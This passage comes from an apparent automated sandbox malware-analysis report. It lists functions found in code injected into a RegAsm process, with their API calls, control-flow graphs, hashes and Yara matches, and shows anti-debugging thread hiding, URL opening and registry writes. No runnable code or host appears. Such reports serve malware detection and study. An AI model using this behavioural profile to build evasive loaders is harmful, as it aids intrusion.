                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3A7D8
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Information$ProcessQueryThread
                                  • String ID:
                                  • API String ID: 142225228-0
                                  • Opcode ID: 00133cc32faff595a26c4de06b7b911790b2ec6a7b4a7baf7a59f1db3d213b15
                                  • Instruction ID: fd95da02b5d06ab83e162b6509c9c5f69399b2f027fe3ca99920311dce34e86c
                                  • Opcode Fuzzy Hash: 00133cc32faff595a26c4de06b7b911790b2ec6a7b4a7baf7a59f1db3d213b15
                                  • Instruction Fuzzy Hash: A0B10993E2E5146F66A08D2DE4D13AEA2E257A5310BF8D1188E619F78DF36CFD4243C1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00C3A30D, Relevance: 1.8, APIs: 1, Instructions: 329nativethreadUNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1909 c3a30d-c3a709 1910 c3a70f-c3a715 1909->1910 1911 c3062c-c30ae6 call c381cf * 2 call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 1909->1911 1912 c3a71a-c3a721 1910->1912 1945 c30aeb-c30b00 1911->1945 1912->1912 1914 c3a723-c3a736 1912->1914 1916 c3a73b-c3a743 1914->1916 1916->1916 1918 c3a745-c3a769 1916->1918 1923 c3a7f4-c3a803 1918->1923 1924 c3a76f-c3a779 1918->1924 1924->1923 1926 c3a77b-c3a77f 1924->1926 1926->1923 1928 c3a781-c3a787 1926->1928 1928->1923 1930 c3a789-c3a78d 1928->1930 1930->1923 1932 c3a78f-c3a793 1930->1932 1932->1923 1934 c3a795-c3a799 1932->1934 1934->1923 1936 c3a79b-c3a7ab 1934->1936 1936->1911 1938 c3a7b1-c3a7bf 1936->1938 1938->1923 1940 c3a7c1-c3a7c9 1938->1940 1940->1923 1942 c3a7cb-c3a7d6 1940->1942 1942->1923 1944 c3a7d8-c3a7dd NtQueryInformationProcess 1942->1944 1948 c3a7e0-c3a7e8 1944->1948 1946 c30b06-c30b23 call c38314 1945->1946 1947 c33189-c331e1 call c33e58 1945->1947 1953 c30b28-c30b2c 1946->1953 1956 c331e6-c335ed 1947->1956 1957 c331e1 call c33e58 1947->1957 1948->1948 1951 c3a7ea-c3a825 1948->1951 1960 c3a827 1951->1960 1961 c3a7cf-c3a7d6 1951->1961 1953->1945 1954 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 1953->1954 1989 c30b8b-c30bf3 call c381cf call c39eee 1954->1989 1990 c31078-c310d8 call c381cf * 2 call c39eee 1954->1990 1962 c335f3-c33620 call c39eee 1956->1962 1963 c3452b-c34534 1956->1963 1957->1956 1960->1960 1961->1923 1961->1944 1974 c33df6-c33e51 call c39eee * 4 1962->1974 1975 c33626-c33726 call c33fdf call c37d70 call c39eee 1962->1975 1965 c34535-c3454c 1963->1965 1965->1965 1968 c3454e-c345a2 1965->1968 1975->1974 2001 c3372c-c33767 call c39eee 1975->2001 1989->1990 2008 c30bf9-c30c05 1989->2008 2022 c38a84-c38f11 call c38799 call c38ab5 1990->2022 2023 c310de-c310e8 call c37ce8 1990->2023 2001->1974 2010 c3376d-c337cc call c39eee 2001->2010 2011 c30c0b-c30c2a call c382c4 2008->2011 2010->1974 2019 c337d2-c337d7 2010->2019 2020 c30c51-c30c56 2011->2020 2021 c30c2c-c30c35 2011->2021 2019->1974 2025 c337dd-c33825 call c337f9 2019->2025 2020->2022 2028 c30c5c-c31053 2020->2028 2021->2022 2026 c30c3b-c30c40 2021->2026 2037 c3110b-c31111 2023->2037 2038 c310ea 2023->2038 2048 c33827-c3382c 2025->2048 2049 c33834-c33840 2025->2049 2026->2022 2031 c30c46-c30c4b 2026->2031 2028->2022 2034 c31059-c3105e 2028->2034 2031->2020 2031->2022 2034->2022 2040 c31064-c31069 2034->2040 2043 c31117-c31143 call c31864 call c37d70 call c317bf 2037->2043 2044 c311af-c311b9 2037->2044 2039 c310f4-c310fe call c33189 2038->2039 2061 c31100-c31104 2039->2061 2040->2022 2046 c3106f-c31072 2040->2046 2043->1911 2082 c31149-c3114d 2043->2082 2044->1911 2050 c311bf-c311c4 2044->2050 2046->1990 2046->2011 2048->1974 2054 c33832 2048->2054 2049->1974 2055 c33841-c3388e call c38314 2049->2055 2056 c311c6-c311ca 2050->2056 2057 c311de-c311eb 2050->2057 2054->2049 2055->1974 2075 c33894-c33919 call c3452b call c338d6 2055->2075 2058 c311d9 call c31d3f 2056->2058 2059 c311cc-c311d7 call c31864 2056->2059 2062 c35a43-c35a52 call c311f0 2057->2062 2063 c340a3-c34108 call c39eee 2057->2063 2058->2057 2059->2057 2059->2058 2061->2063 2078 c35a56 2062->2078 2079 c35abf-c35ac6 call c352b9 2062->2079 2075->1974 2106 c3391f-c33957 call c39eee 2075->2106 2083 c35a58-c35a7f 2078->2083 2084 c35abd-c35abe 2078->2084 2091 c35b31-c35f1a 2079->2091 2092 c35ac8-c35ae3 2079->2092 2082->2044 2088 c3114f-c311ae call c3949d call c31719 call c31dbc 2082->2088 2094 c35a82-c35aac 2083->2094 2095 c35ae7-c35aee 2083->2095 2084->2079 2088->2044 2098 c35ae4 2092->2098 2094->2098 2107 c35aae-c35ac6 call c35200 2094->2107 2100 c35af0-c35b1e 2095->2100 2101 c35b1f-c35b2c 2095->2101 2098->2095 2100->2101 2101->2091 2106->1974 2114 c3395d-c33d99 call c39eee 2106->2114 2107->2091 2107->2092 2114->1974 2119 c33d9b-c33dd3 call c39eee * 2 2114->2119
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3A7D8
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Information$ProcessQueryThread
                                  • String ID:
                                  • API String ID: 142225228-0
                                  • Opcode ID: be58969baf69663eeee644a64fb9ef284b25a6643e8ecf1cff3a39de77eeaf43
                                  • Instruction ID: 6573cc18fa21c6a683cdb32346d6c2a35e8309c1736688324ee92b409c612590
                                  • Opcode Fuzzy Hash: be58969baf69663eeee644a64fb9ef284b25a6643e8ecf1cff3a39de77eeaf43
                                  • Instruction Fuzzy Hash: 50B1FA93E1E5146F66A48D2DE4D13AEA2E257A13107F8D1188E619F78DF36CFD4243C1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00C3A824, Relevance: 1.5, APIs: 1, Instructions: 15nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3A7D8
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationProcessQuery
                                  • String ID:
                                  • API String ID: 1778838933-0
                                  • Opcode ID: 79751bbd70b7e6565d9dd082c8a01e4ceabf00169ce343474bf4350be8c7e97c
                                  • Instruction ID: ee2e6f07f7eda139197c809ad2e5c008748412c27df5220ee56f31581a8be4fc
                                  • Opcode Fuzzy Hash: 79751bbd70b7e6565d9dd082c8a01e4ceabf00169ce343474bf4350be8c7e97c
                                  • Instruction Fuzzy Hash: D9D012352143024E6B1DEE24C1D65693776AED6354B588008CA5106418F2236EAAC762
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 00C39B4C, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00C39515,00000040,00C30A94,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C39B65
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                  • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                  • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                  • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 00C352B9, Relevance: 3.1, APIs: 2, Instructions: 97networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1631 c352b9-c352d3 InternetOpenA 1632 c357fa-c3580a call c39eee 1631->1632 1633 c352d9-c3530a call c39eee 1631->1633 1633->1632 1638 c35310-c35336 InternetOpenUrlA 1633->1638 1638->1632 1639 c3533c-c35358 1638->1639 1640 c3535a-c35377 1639->1640 1641 c35385-c353a1 call c39eee 1640->1641 1642 c35379-c35381 1640->1642 1641->1632 1645 c353a7-c357a4 1641->1645 1642->1641 1647 c357b6-c357f5 call c39eee * 2 1645->1647 1648 c357a6-c357af 1645->1648 1648->1640
                                  APIs
                                  • InternetOpenA.WININET(00C35AC4,00000000,00000000,00000000,00000000,00C3124E,00000000,00000000,00000000,00000000,0000006D,0000020C,?,00C35A48,00000000,000000FF), ref: 00C352C9
                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,00000004,00000000,?,00000000), ref: 00C3532E
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InternetOpen
                                  • String ID:
                                  • API String ID: 2038078732-0
                                  • Opcode ID: bc5163e42e9add266c6683ac9f16a41edb28294c7a844079115d7c557696cb88
                                  • Instruction ID: 9a00d104b1d98ae9b1dd0a681319cc467719d854ea630400ffd9a73297a2936b
                                  • Opcode Fuzzy Hash: bc5163e42e9add266c6683ac9f16a41edb28294c7a844079115d7c557696cb88
                                  • Instruction Fuzzy Hash: DB31933065438AEFEF35CE64CD55FEE3666EF04740F508429FD4A9A190D7729A84EB10
                                  Uniqueness

                                  Uniqueness Score: 4.01%

                                  Function 00C317CE, Relevance: 1.9, APIs: 1, Instructions: 369registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1653 c317ce-c368cd RegCreateKeyExA call c31844 call c31820 1661 c36943-c36946 1653->1661 1662 c368d0-c368e9 call c317ce 1653->1662 1663 c36948-c3695b 1661->1663 1672 c36947 1662->1672 1673 c368eb-c368f6 1662->1673 1669 c3695d-c3696f 1663->1669 1671 c36d64-c36d76 call c351b5 1669->1671 1672->1663 1673->1669 1676 c368f8-c368fb 1673->1676 1680 c36971-c36d62 1676->1680 1681 c368fe-c36913 call c31d5a call c3186b 1676->1681 1680->1671 1687 c36918-c36940 1681->1687 1687->1661
                                  APIs
                                  • RegCreateKeyExA.KERNEL32(80000001,00C368D8,00000000,00000000,00000000,000F003F,00000000,?,?,00C31137,?,?,00000000,00000000,000000FF,00000007), ref: 00C317FE
                                    • Part of subcall function 00C31820: RegSetValueExA.KERNELBASE(?,00C368C2,00000000,00000001,?,?,?,?,?,?,00C31137,?,?,00000000,00000000,000000FF), ref: 00C31831
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateValue
                                  • String ID:
                                  • API String ID: 2259555733-0
                                  • Opcode ID: 502ffc77333b3ead3e48a26d063047435d608c0ded7f583f21f06490bcde5c1c
                                  • Instruction ID: c3e627e9c410bcc4084109a7ccb9e0cce948da5780c9e5133b0c036d691500b6
                                  • Opcode Fuzzy Hash: 502ffc77333b3ead3e48a26d063047435d608c0ded7f583f21f06490bcde5c1c
                                  • Instruction Fuzzy Hash: 67C16CD3D2E5543FA2918D29E8A63AEE6E117613007B8D2498E515F79EF36CFD0243C1
                                  Uniqueness

                                  Uniqueness Score: 0.14%

                                  Function 00C32B50, Relevance: 1.8, APIs: 1, Instructions: 275threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2124 c32b50-c32f82 TerminateThread 2127 c34bb7 call c32b4a 2124->2127 2129 c34bbc-c34bcc call c38fc5 call c345aa 2127->2129 2134 c34bdb-c34c26 call c345aa 2129->2134 2135 c34bce-c34bd3 2129->2135 2134->2129 2140 c3a80b 2134->2140 2135->2129 2141 c3a810 2140->2141 2142 c3a80b call c32a91 2140->2142 2143 c3a815 2141->2143 2142->2141 2143->2143
                                  APIs
                                  • TerminateThread.KERNEL32(000000FE,00000000), ref: 00C32F78
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: TerminateThread
                                  • String ID:
                                  • API String ID: 1852365436-0
                                  • Opcode ID: 6670c59fd34363fb74b30b30c27a4bf1a5391331b13fca0eaddc9fd4ae2d1e1f
                                  • Instruction ID: 588ba526f6859e4ed735627b89a88120e583cf20e1c4f6089979a1b07c4b1a50
                                  • Opcode Fuzzy Hash: 6670c59fd34363fb74b30b30c27a4bf1a5391331b13fca0eaddc9fd4ae2d1e1f
                                  • Instruction Fuzzy Hash: 32913393E5E5183F66A04C2DF8A67AEA2E243907007F4D2049F126F78DF3ACBC4206C0
                                  Uniqueness

                                  Uniqueness Score: 1.31%

                                  Function 1D89B9BA, Relevance: 1.6, APIs: 1, Instructions: 99UNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2144 1d89b9ba-1d89b9c5 2145 1d89b9cf-1d89ba42 2144->2145 2146 1d89b9c7-1d89b9cd 2144->2146 2149 1d89ba44 2145->2149 2150 1d89ba47-1d89ba4d 2145->2150 2146->2145 2149->2150 2151 1d89ba4f 2150->2151 2152 1d89ba52-1d89ba5b 2150->2152 2151->2152 2153 1d89ba5d-1d89ba65 GetFileSecurityW 2152->2153 2154 1d89ba9c-1d89baa1 2152->2154 2156 1d89ba6b-1d89ba7d 2153->2156 2154->2153 2157 1d89ba7f-1d89ba9b 2156->2157 2158 1d89baa3-1d89baa8 2156->2158 2158->2157
                                  APIs
                                  • GetFileSecurityW.KERNELBASE(?,?,0A1AC197,00000000), ref: 1D89BA63
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileSecurity
                                  • String ID:
                                  • API String ID: 200422441-0
                                  • Opcode ID: c3acb4a7f354ee0913d4f5ead1e638dd457baf0b9e38a5c5d6c9eb8a0e4f69e1
                                  • Instruction ID: 67c85427a4533333c214f7b5b865c419ad403c0a9db2b18fee58ffeff83d7365
                                  • Opcode Fuzzy Hash: c3acb4a7f354ee0913d4f5ead1e638dd457baf0b9e38a5c5d6c9eb8a0e4f69e1
                                  • Instruction Fuzzy Hash: 7D31506150E3C05FD7038B749CA5652BFB49F57214B0E84DBD8C4CF1A3D229A849C772
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 1D89A686, Relevance: 1.6, APIs: 1, Instructions: 97registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1D89A731
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 071a1eada05b80ffb9704ece2c92b82c5db646fed447b7d43f40c1be61f34b0e
                                  • Instruction ID: be895e503007d706e839ca12ced3191e14ab0128cf90d7164d45974f4b3e65d0
                                  • Opcode Fuzzy Hash: 071a1eada05b80ffb9704ece2c92b82c5db646fed447b7d43f40c1be61f34b0e
                                  • Instruction Fuzzy Hash: 1731C1B11093806FE7128B648C85FA7FFBCEF46210F08849BF985DB193D224A909C772
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 00C393ED, Relevance: 1.6, APIs: 1, Instructions: 94libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,B769339E,?,00C30A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3822B
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 75225bba369b5256672b6e8c27de006746047b5c26f70e36a30c11dd7c9d6c16
                                  • Instruction ID: 5281e66024f92f62c96b394af057b714089515eb0eb46c3312374725c9423987
                                  • Opcode Fuzzy Hash: 75225bba369b5256672b6e8c27de006746047b5c26f70e36a30c11dd7c9d6c16
                                  • Instruction Fuzzy Hash: F9213BB47143179ADB24AE68C4E07FB27A2EF56750FA4412CFC9687106DB75CC4B8641
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 1D89A779, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,0A1AC197,00000000,00000000,00000000,00000000), ref: 1D89A834
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: c6d1e2b3ea1fbc7c4d3faa696deaea708056cbd98923ff2b83d089a4e89c3520
                                  • Instruction ID: 3099faa79538f4cfd127a62d259e4eec24abf1a4cf9550a3ffaa3c334c6d479f
                                  • Opcode Fuzzy Hash: c6d1e2b3ea1fbc7c4d3faa696deaea708056cbd98923ff2b83d089a4e89c3520
                                  • Instruction Fuzzy Hash: 6D31A1755053846FE722CF21CC84FA3FFA8EF46610F08849AE985DB153D264E549CB61
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 1D89BAB8, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateMutexW.KERNEL32(?,?), ref: 1D89BB51
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  • Opcode ID: b6e17f06fa179f3d38a7408c5f56e06b98ac442780c2806bd503504f8fb99076
                                  • Instruction ID: be144f5fbb854a74b0c1d83ad40b5a1d1f4a841bccf3d8fff6efce6f4203da4a
                                  • Opcode Fuzzy Hash: b6e17f06fa179f3d38a7408c5f56e06b98ac442780c2806bd503504f8fb99076
                                  • Instruction Fuzzy Hash: A63180B5505384AFE712CB25CC85F66FBE8EF45610F05849AE984CB292D365E908CB71
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 1D89A88A, Relevance: 1.6, APIs: 1, Instructions: 77registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1D89A926
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 4196d41a5541e2fa42bd61294e580b5a4e4dc3513a76e6cf2a50f8379eacf318
                                  • Instruction ID: 1d2388fe6706f6490216890c424f15c47bca7bca4e999bb26d2e7356c282d4fa
                                  • Opcode Fuzzy Hash: 4196d41a5541e2fa42bd61294e580b5a4e4dc3513a76e6cf2a50f8379eacf318
                                  • Instruction Fuzzy Hash: A321C8755093C06FD3138B258C51B62BFB8EF87A10F0981CFE9848B693D265A919C7B2
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00C32B4A, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateThread.KERNEL32(000000FE,00000000), ref: 00C32F78
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: TerminateThread
                                  • String ID:
                                  • API String ID: 1852365436-0
                                  • Opcode ID: 7793c82ec79c2428207682b383148305938dfb2e6feb53ae70cce6dc9d2de6ad
                                  • Instruction ID: 7a450f0de8de004e057a76931e51ba8bbbedb2714abcd1ed67f3fe06b3565cb5
                                  • Opcode Fuzzy Hash: 7793c82ec79c2428207682b383148305938dfb2e6feb53ae70cce6dc9d2de6ad
                                  • Instruction Fuzzy Hash: 221134B0750301AFEB205E688D8AFED3365EF05360FE00262FD129B1D2D760DCC28A26
                                  Uniqueness

                                  Uniqueness Score: 1.31%

                                  Function 1D89A6B2, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1D89A731
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: e30145906b97d9321a09fca028b0bc85016f3db82bda875bd45f80ed62434b10
                                  • Instruction ID: 36229ea16bbfc98e69579a5f9afe793b58915a5c2e7c09d9c5927cf4fe0d29ca
                                  • Opcode Fuzzy Hash: e30145906b97d9321a09fca028b0bc85016f3db82bda875bd45f80ed62434b10
                                  • Instruction Fuzzy Hash: EB21CFB2500704BFEB21DF55DC85FABF7ECEF84610F04845AF985DB251D624E6088AB2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 1D89B2F7, Relevance: 1.6, APIs: 1, Instructions: 74libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,00000EB4), ref: 1D89B397
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: ad90aea2e24f00dae85f055ca1a79b7b44f94d5f58aade24af76c28d89a4cd12
                                  • Instruction ID: ff5f32502c714b9173267842314f4f05949fe44f68441cc7eaf18fec23c2a3b1
                                  • Opcode Fuzzy Hash: ad90aea2e24f00dae85f055ca1a79b7b44f94d5f58aade24af76c28d89a4cd12
                                  • Instruction Fuzzy Hash: 9F21D7755493C46FE712CB11CC85BA2FFA8DF42720F0880DAE9849F193D268A949C7B2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 1D89BADE, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateMutexW.KERNEL32(?,?), ref: 1D89BB51
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  • Opcode ID: 3d0253444f2febc85da9e2dbe4a6fc593a46fa802122d0b41ff8614687e5d32e
                                  • Instruction ID: b7a7d282a3df28fa8360faef4d99480de95147feeae214c109444f2b78aa2704
                                  • Opcode Fuzzy Hash: 3d0253444f2febc85da9e2dbe4a6fc593a46fa802122d0b41ff8614687e5d32e
                                  • Instruction Fuzzy Hash: D421CFB1600244AFE711DF25CC85B66FBE8EF44620F05846AED88CB285D371F904CB72
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 1D89A7BA, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,0A1AC197,00000000,00000000,00000000,00000000), ref: 1D89A834
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 8ef8596e1fd591ecc9d2e54991add54899be2776da775874bdd2368db75353f4
                                  • Instruction ID: 2a5e988c4e90b66f524f109efda8ecf410a6085b616a0d1557eb935fed166675
                                  • Opcode Fuzzy Hash: 8ef8596e1fd591ecc9d2e54991add54899be2776da775874bdd2368db75353f4
                                  • Instruction Fuzzy Hash: 4A218E75600244AFEB20CF56CC84FA7F7ECEF84610F04845AE989DB252D760E549CAB2
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 1D89B32E, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,00000EB4), ref: 1D89B397
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 7fc326ea7c004fb3960906221553e8443fd7015c0571ca0a2458255df1b51a52
                                  • Instruction ID: 40de7d47f2d5a645223774c8c75515e1c0bbfa34ef168ddb347b79944592d644
                                  • Opcode Fuzzy Hash: 7fc326ea7c004fb3960906221553e8443fd7015c0571ca0a2458255df1b51a52
                                  • Instruction Fuzzy Hash: F811E575600244AFF721DB15DCC5BA6FB98DF84B20F14C059ED889B281D6B5BA48CAA2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 1D89BA1E, Relevance: 1.6, APIs: 1, Instructions: 52UNIQUE
                                  Download Yara Rule
                                  APIs
                                  • GetFileSecurityW.KERNELBASE(?,?,0A1AC197,00000000), ref: 1D89BA63
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileSecurity
                                  • String ID:
                                  • API String ID: 200422441-0
                                  • Opcode ID: 7fccff05780e4d0235fdc41725f35f657c7316918af786c595ca0bd1f005a720
                                  • Instruction ID: 10554a08d36f28fdb05a27ed357d45171423fbdee6816e5ee199f75773a0d48d
